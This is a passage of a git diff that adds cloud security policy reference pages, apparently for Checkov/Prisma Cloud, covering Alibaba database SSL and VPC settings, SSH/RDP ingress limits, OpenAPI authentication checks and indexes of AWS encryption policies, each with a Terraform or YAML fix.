anyone on the internet. This could lead to several security risks, including unauthorized access and data theft. To restrict access to your Alibaba Cloud MongoDB instance, disable public network access and allow access only from a private endpoint. + + +// === Fix - Runtime + + +=== Fix - Buildtime + + +*Terraform* + +To restrict public access to an Alibaba Cloud MongoDB instance, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +resource "alicloud_mongodb_instance" "pass2" { + engine_version = "3.4" + db_instance_class = "dds.mongo.mid" + db_instance_storage = 10 + vswitch_id = alicloud_vswitch.ditch.id + security_ip_list = ["10.168.1.12", "100.69.7.112"] + kms_encryption_context= { + + } + + # tde_status = "Disabled" + ssl_action = "Update" + # not set + network_type = "VPC" +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-uses-ssl.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-uses-ssl.adoc new file mode 100644 index 000000000..fa6d29db8 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-uses-ssl.adoc @@ -0,0 +1,61 @@ +== Alibaba Cloud Mongodb instance does not use SSL + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 775e2cd1-e23e-4ed4-8f39-36a0332471ab + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py[CKV_ALI_42] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +SSL helps protect your data from unauthorized access or tampering by encrypting the data as it is transmitted between the MongoDB instance and the client.
+By enabling SSL, you can help ensure that only authorized users with the correct keys can access and decrypt the data, and that the data is protected while in transit. + +=== Fix - Buildtime + +To configure an Alibaba Cloud MongoDB instance to use SSL, add the following code to your Terraform file during buildtime. + + +*Terraform* + + + + +[source,go] +---- +resource "alicloud_mongodb_instance" "pass2" { + engine_version = "3.4" + db_instance_class = "dds.mongo.mid" + db_instance_storage = 10 + vswitch_id = alicloud_vswitch.ditch.id + security_ip_list = ["10.168.1.12", "100.69.7.112"] + ssl_action = "Update" + network_type = "VPC" +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc new file mode 100644 index 000000000..555392371 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc @@ -0,0 +1,67 @@ +== Alibaba Cloud MongoDB is not deployed inside a VPC + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8f96497a-ecbd-4ee2-a77b-4495a21d521e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py[CKV_ALI_41] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Deploying your MongoDB database inside a VPC helps protect your data from unauthorized access or tampering by isolating the database from the public internet. +By deploying your database inside a VPC, you can help ensure that only authorized users with the correct permissions can access the data, and that the data is protected from external threats such as hackers or malware.
+ +=== Fix - Buildtime + +To deploy an Alibaba Cloud MongoDB instance inside a VPC, add the following code to your Terraform file during buildtime. + + +*Terraform* + + + + +[source,go] +---- +resource "alicloud_mongodb_instance" "pass" { + engine_version = "3.4" + db_instance_class = "dds.mongo.mid" + db_instance_storage = 10 + vswitch_id = alicloud_vswitch.ditch.id + security_ip_list = ["10.168.1.12", "100.69.7.112"] + ssl_action = "Close" + network_type = "VPC" +} + + +resource "alicloud_vswitch" "ditch" { + vpc_id = "anyoldtripe" + cidr_block = "172.16.0.0/21" +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-rds-instance-uses-ssl.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-rds-instance-uses-ssl.adoc new file mode 100644 index 000000000..77b1fa1c7 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-rds-instance-uses-ssl.adoc @@ -0,0 +1,64 @@ +== Alibaba Cloud RDS instance does not use SSL + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 20f83821-cc13-405f-a437-5926c6ef9919 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py[CKV_ALI_20] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +If an Alibaba Cloud RDS instance is not using SSL (Secure Sockets Layer) to encrypt data transmissions, there are several potential risks such as data interception, data tampering and compliance violations. By implementing SSL, you can help protect your data by encrypting the data during transmission between the RDS instance and the client. This ensures that only authorized users with the correct keys can access and decrypt the data.
+ +=== Fix - Buildtime + + +*Terraform* + +To configure an Alibaba Cloud RDS instance to use SSL, add the following code to your Terraform file during buildtime. + + + + +[source,go] +---- +resource "alicloud_db_instance" "pass" { + engine = "MySQL" + engine_version = "5.6" + ssl_action = "Open" + instance_storage = "30" + instance_type = "mysql.n2.small.25" + parameters = [ + { + name = "innodb_large_prefix" + value = "ON" + }, + { + name = "connect_timeout" + value = "50" + } + ] +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-22.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-22.adoc new file mode 100644 index 000000000..79f16ade4 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-22.adoc @@ -0,0 +1,84 @@ +== Alibaba Cloud Security group allows internet traffic to SSH port (22) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2b857e15-2f76-4d8b-bff9-39f92b8569e1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py[CKV_ALI_2] + +|Severity +|HIGH + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Allowing internet traffic to the SSH (Secure Shell) port (22) in Alibaba Cloud Security groups can pose several dangers, such as unauthorized access and data breaches. This policy identifies security groups that allow inbound traffic on SSH port (22) from the public internet. +As a best practice, restrict security groups to only allow permitted traffic and limit brute force attacks on your network.
+//// +=== Fix - Runtime + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Elastic Compute Service + +. In the left-side navigation pane, choose Network & Security > Security Groups + +. Select the reported security group and then click Add Rules in the Actions column + +. In Inbound tab, Select the rule having 'Action' as Allow, 'Authorization Object' as 0.0.0.0/0 and 'Port Range' value as 22, Click Modify in the Actions column + +. Replace the value 0.0.0.0/0 with specific IP address range. + +. Click on 'OK' +//// + +=== Fix - Buildtime + + +*Terraform* + +To configure Security group rules to allow SSH access only from specific trusted IP addresses, add the following code to your Terraform file during buildtime. The CIDR range below is an example; replace it with your own trusted range. + + + +[source,go] +---- +resource "alicloud_security_group_rule" "allow_ssh_trusted" { + type = "ingress" + ip_protocol = "tcp" + nic_type = "internet" + policy = "accept" + port_range = "22/22" + security_group_id = alicloud_security_group.default.id + cidr_ip = "10.10.0.0/16" +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-3389.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-3389.adoc new file mode 100644 index 000000000..33da41aac --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-3389.adoc @@ -0,0 +1,83 @@ +== Alibaba Cloud Security group allows internet traffic to RDP port (3389) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6c534f38-cc2c-4ebb-86a5-2e5d3114d376 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py[CKV_ALI_3] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Allowing internet traffic to the RDP (Remote Desktop Protocol) port (3389) in Alibaba Cloud Security groups can pose several risks, such as unauthorized access and malware attacks. This policy identifies security groups that allow inbound traffic on RDP port (3389) from the public internet. +As a best practice, restrict security groups to allow only authorized traffic to access your network. +//// +=== Fix - Runtime + + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Elastic Compute Service + +. In the left-side navigation pane, choose Network & Security > Security Groups + +. Select the reported security group and then click Add Rules in the Actions column + +. In Inbound tab, Select the rule having 'Action' as Allow, 'Authorization Object' as 0.0.0.0/0 and 'Port Range' value as 3389, Click Modify in the Actions column + +. Replace the value 0.0.0.0/0 with specific IP address range. + +. 
Click on 'OK' +//// + +=== Fix - Buildtime + + +*Terraform* + +To configure Security group rules to restrict internet traffic to the RDP (Remote Desktop Protocol) port (3389) in your Alibaba Cloud Security groups, add the following code to your Terraform file during buildtime. The CIDR range below is an example; replace it with your own trusted range. + + +[source,go] +---- +resource "alicloud_security_group_rule" "allow_rdp_trusted" { + type = "ingress" + ip_protocol = "tcp" + nic_type = "internet" + policy = "accept" + port_range = "3389/3389" + security_group_id = alicloud_security_group.default.id + cidr_ip = "10.10.0.0/16" +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-policies.adoc new file mode 100644 index 000000000..83185ef11 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-policies.adoc @@ -0,0 +1,3 @@ +== Alibaba Policies + + diff --git a/code-security/policy-reference/api-policies/api-policies.adoc b/code-security/policy-reference/api-policies/api-policies.adoc new file mode 100644 index 000000000..ba73b2bc3 --- /dev/null +++ b/code-security/policy-reference/api-policies/api-policies.adoc @@ -0,0 +1,3 @@ +== API Policies + + diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty.adoc new file mode 100644 index 000000000..4e3192892 --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty.adoc @@ -0,0 +1,54 @@ +== OpenAPI If the security scheme is not of type 'oauth2', the array value must be empty + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud 
Policy ID +| d9145ac2-c2bf-416b-97c6-a05ec8668827 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py[CKV_OPENAPI_2] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + + +Restrict the security section of OpenAPI documents to only include OAuth 2.0 authorization schemes defined in the security definitions section to prevent unauthorized access to the API. This is achieved by ensuring that only OAuth 2.0 schemes defined in the security section have a value. + +=== Fix - Buildtime + +To restrict the security section of OpenAPI documents to only include OAuth 2.0 authorization schemes, update the security section of your OpenAPI definition during buildtime. + + +*OpenAPI* + + +Ensure that your generated OpenAPI document does not include a security section for authentication types that are not OAuth 2.0, or that any such scheme is listed with an empty array. +Below is an example: + +[source,yaml] +---- +securityDefinitions: + some_auth: + type: basic +security: + - some_auth: [] +----
+ +|=== + + + +=== Description + +If security schemes are not defined in OpenAPI Security Objects for Operations, the API may be exposed without proper authentication, which could lead to unauthorized access. This could result in security vulnerabilities that can be exploited by attackers to gain access to sensitive data or perform unauthorized actions. + + + +=== Fix - Buildtime + +*OpenAPI* + + + + +Ensure that you have an authentication type in the security section of your path. +For example: + +[source,yaml] +---- +paths: + "/": + get: + operationId: id + summary: example +- security: [] ++ security: ++ - OAuth2: ++ - write +---- diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-requirement-defined-in-securitydefinitions.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-requirement-defined-in-securitydefinitions.adoc new file mode 100644 index 000000000..52c6ae97e --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-requirement-defined-in-securitydefinitions.adoc @@ -0,0 +1,50 @@ +== OpenAPI Security requirement not defined in the security definitions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5cc16527-6ece-48aa-a135-89fcd361c402 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/SecurityRequirement.py[CKV_OPENAPI_6] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + + +Security definitions in the `security` section of a path or root should refer to an authentication scheme identified in the `securityDefinitions` section. + +=== Fix - Buildtime + +*OpenAPI* + + +For example, ensure that `petstore_auth` is defined in the `securityDefinitions` section: +[source,yaml] +---- + +... +security: + - petstore_auth: + - write:pets + - read:pets + +...
+---- + diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel.adoc new file mode 100644 index 000000000..14d7568ca --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel.adoc @@ -0,0 +1,54 @@ +== Cleartext credentials over unencrypted channel should not be accepted for the operation + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e78cca1d-0acc-45c1-8bf4-8fb7e0210d96 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py[CKV_OPENAPI_3] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + + +Sending credentials over HTTP in cleartext exposes API calls to attacks, including man-in-the-middle attacks. +Ensure that you are using an encrypted channel for sending credentials. + +=== Fix - Buildtime + + +*OpenAPI* + + +Ensure that you are not using an HTTP security scheme that accepts cleartext credentials, such as the `unencryptedScheme` scheme in the following example. 
+For example: +[source,yaml] +---- +components: + securitySchemes: +-   unencryptedScheme: +-     type: http +-     scheme: basic +paths: + "/": + get: + security: +-   - unencryptedScheme: [] +---- diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-securitydefinitions-is-defined-and-not-empty.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-securitydefinitions-is-defined-and-not-empty.adoc new file mode 100644 index 000000000..817c97b08 --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-securitydefinitions-is-defined-and-not-empty.adoc @@ -0,0 +1,59 @@ +== OpenAPI Security Definitions Object should be set and not empty + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 10efd986-6125-41f6-83f9-871a0a657aae + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/SecurityDefinitions.py[CKV_OPENAPI_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + + +Define the authentication types that your API supports for OpenAPI/Swagger 2.0 in securityDefinitions. +Not defining authentication types exposes your APIs to attacks, while not documenting the authentication type makes it more difficult to understand how to access your API. + +=== Fix - Buildtime + + +*OpenAPI* + + +Ensure that your OpenAPI 2.0 spec includes a securityDefinitions section. 
+For example: +[source,yaml] +---- +securityDefinitions: + BasicAuth: + type: basic + ApiKeyAuth: + type: apiKey + in: header + name: apiKey + OAuth2: + type: oauth2 + flow: implicit + authorizationUrl: https://swagger.io/api/oauth/dialog + tokenUrl: https://swagger.io/api/oauth/token + scopes: + read: read + write: write +---- diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-the-global-security-field-has-rules-defined.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-the-global-security-field-has-rules-defined.adoc new file mode 100644 index 000000000..b52edf884 --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-the-global-security-field-has-rules-defined.adoc @@ -0,0 +1,46 @@ +== OpenAPI Security object needs to have defined rules in its array and rules should be defined in the securityScheme + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 21b82979-16c2-4cfe-92e6-7848d37c04e2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py[CKV_OPENAPI_4] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + + +OpenAPI uses security schemes to reference authentication and authorization schemes. +Your APIs should have authentication schemes in place and documented in the OpenAPI specification, as well as applied to individual operations or the entire API in the security details. + +=== Fix - Buildtime + + +*OpenAPI* + + +Ensure that your specification defines security schemes and applies them in the global `security` field. 
+For example: +[source,yaml] +---- +components: + securitySchemes: + api_key: + type: apiKey + name: api_key + in: header +security: + - api_key: [] +---- diff --git a/code-security/policy-reference/api-policies/openapi-policies/openapi-policies.adoc b/code-security/policy-reference/api-policies/openapi-policies/openapi-policies.adoc new file mode 100644 index 000000000..1891c65ed --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/openapi-policies.adoc @@ -0,0 +1,39 @@ +== OpenAPI Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty.adoc[OpenAPI If the security scheme is not of type 'oauth2', the array value must be empty] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py[CKV_OPENAPI_2] +|HIGH + + +|xref:ensure-that-security-operations-is-not-empty.adoc[OpenAPI Security object for operations, if defined, must define a security scheme, otherwise it should be considered an error] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/generic/SecurityOperations.py[CKV_OPENAPI_5] +|HIGH + + +|xref:ensure-that-security-requirement-defined-in-securitydefinitions.adoc[OpenAPI Security requirement not defined in the security definitions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/SecurityRequirement.py[CKV_OPENAPI_6] +|HIGH + + +|xref:ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel.adoc[Cleartext credentials over unencrypted channel should not be accepted for the operation] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py[CKV_OPENAPI_3] +|HIGH + + +|xref:ensure-that-securitydefinitions-is-defined-and-not-empty.adoc[OpenAPI Security Definitions Object should be set and not empty] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/SecurityDefinitions.py[CKV_OPENAPI_1] +|HIGH + + +|xref:ensure-that-the-global-security-field-has-rules-defined.adoc[OpenAPI Security object needs to have defined rules in its array and rules should be defined in the securityScheme] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py[CKV_OPENAPI_4] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/autoscaling-groups-should-supply-tags-to-launch-configurations.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/autoscaling-groups-should-supply-tags-to-launch-configurations.adoc new file mode 100644 index 000000000..323fe0e9f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/autoscaling-groups-should-supply-tags-to-launch-configurations.adoc @@ -0,0 +1,65 @@ +== Autoscaling groups did not supply tags to launch configurations + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 660b9b45-f88a-476f-a1f8-292f9e284bd6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AutoScalingTagging.py[CKV_AWS_153] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Tags help you do the following: + +* Control access to Auto Scaling groups based on tags. +You can use conditions in your IAM policies to control access to Auto Scaling groups based on the tags on that group. + +* Identify and organize your AWS resources. +Many AWS services support tagging, so you can assign the same tag to resources from different services to indicate that the resources are related. +You can apply tag-based, resource-level permissions in the identity-based policies that you create for Amazon EC2 Auto Scaling. 
+This gives you better control over which resources a user can create, modify, use, or delete. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_autoscaling_group +* *Arguments:* launch_configuration, tags + + +[source,go] +---- +resource "aws_autoscaling_group" "passtag" { + ... ++ launch_configuration = aws_launch_configuration.foobar.name ++ tags = concat( + [ + { + "key" = "interpolation1" + "value" = "value3" + "propagate_at_launch" = true + }, + ... +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/aws-general-policies.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/aws-general-policies.adoc new file mode 100644 index 000000000..680a892bc --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/aws-general-policies.adoc @@ -0,0 +1,865 @@ +== AWS General Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:autoscaling-groups-should-supply-tags-to-launch-configurations.adoc[Autoscaling groups did not supply tags to launch configurations] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AutoScalingTagging.py[CKV_AWS_153] +|LOW + + +|xref:bc-aws-general-100.adoc[AWS Image Builder component not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py[CKV_AWS_180] +|LOW + + +|xref:bc-aws-general-101.adoc[AWS S3 Object Copy not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py[CKV_AWS_181] +|LOW + + +|xref:bc-aws-general-102.adoc[AWS Doc DB not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py[CKV_AWS_182] +|LOW + + +|xref:bc-aws-general-103.adoc[AWS EBS 
Snapshot Copy not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py[CKV_AWS_183] +|LOW + + +|xref:bc-aws-general-104.adoc[AWS Elastic File System (EFS) is not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py[CKV_AWS_184] +|LOW + + +|xref:bc-aws-general-105.adoc[AWS Kinesis streams encryption is using default KMS keys instead of Customer's Managed Master Keys] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py[CKV_AWS_185] +|LOW + + +|xref:bc-aws-general-106.adoc[AWS S3 bucket Object not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py[CKV_AWS_186] +|LOW + + +|xref:bc-aws-general-107.adoc[AWS Sagemaker domain not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py[CKV_AWS_187] +|LOW + + +|xref:bc-aws-general-109.adoc[AWS EBS Volume not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py[CKV_AWS_189] +|LOW + + +|xref:bc-aws-general-110.adoc[AWS lustre file system not configured with CMK key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py[CKV_AWS_190] +|LOW + + +|xref:bc-aws-general-111.adoc[AWS Elasticache replication group not configured with CMK key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py[CKV_AWS_191] +|LOW + + +|xref:bc-aws-general-22.adoc[AWS Kinesis streams 
are not encrypted using Server Side Encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py[CKV_AWS_43] +|MEDIUM + + +|xref:bc-aws-general-23.adoc[DAX is not securely encrypted at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DAXEncryption.py[CKV_AWS_47] +|HIGH + + +|xref:bc-aws-general-24.adoc[ECR image tags are not immutable] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECRImmutableTags.py[CKV_AWS_51] +|LOW + + +|xref:bc-aws-general-26.adoc[AWS resources that support tags do not have Tags] +|[CKV_AWS_CUSTOM_1] +|LOW + + +|xref:bc-aws-general-27.adoc[AWS CloudFront web distribution with AWS Web Application Firewall (AWS WAF) service disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/WAFEnabled.py[CKV_AWS_68] +|MEDIUM + + +|xref:bc-aws-general-28.adoc[DocumentDB is not encrypted at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBEncryption.py[CKV_AWS_74] +|MEDIUM + + +|xref:bc-aws-general-29.adoc[Athena Database is not encrypted at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py[CKV_AWS_77] +|MEDIUM + + +|xref:bc-aws-general-30.adoc[CodeBuild project encryption is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py[CKV_AWS_78] +|MEDIUM + + +|xref:bc-aws-general-31.adoc[AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py[CKV_AWS_79] +|MEDIUM + + +|xref:bc-aws-general-32.adoc[MSK cluster encryption at rest and in transit is not enabled] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py[CKV_AWS_81] +|MEDIUM + + +|xref:bc-aws-general-33.adoc[Athena workgroup does not prevent disabling encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py[CKV_AWS_82] +|MEDIUM + + +|xref:bc-aws-general-37.adoc[Glue Data Catalog encryption is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py[CKV_AWS_94] +|HIGH + + +|xref:bc-aws-general-38.adoc[Not all data stored in Aurora is securely encrypted at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AuroraEncryption.py[CKV_AWS_96] +|HIGH + + +|xref:bc-aws-general-39.adoc[EFS volumes in ECS task definitions do not have encryption in transit enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py[CKV_AWS_97] +|HIGH + + +|xref:bc-aws-general-40.adoc[AWS SageMaker endpoint not configured with data encryption at rest using KMS key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py[CKV_AWS_98] +|HIGH + + +|xref:bc-aws-general-41.adoc[AWS Glue security configuration encryption is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py[CKV_AWS_99] +|HIGH + + +|xref:bc-aws-general-42.adoc[Neptune cluster instance is publicly available] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py[CKV_AWS_102] +|HIGH + + +|xref:bc-aws-general-43.adoc[AWS Load Balancer is not using TLS 1.2] +| 
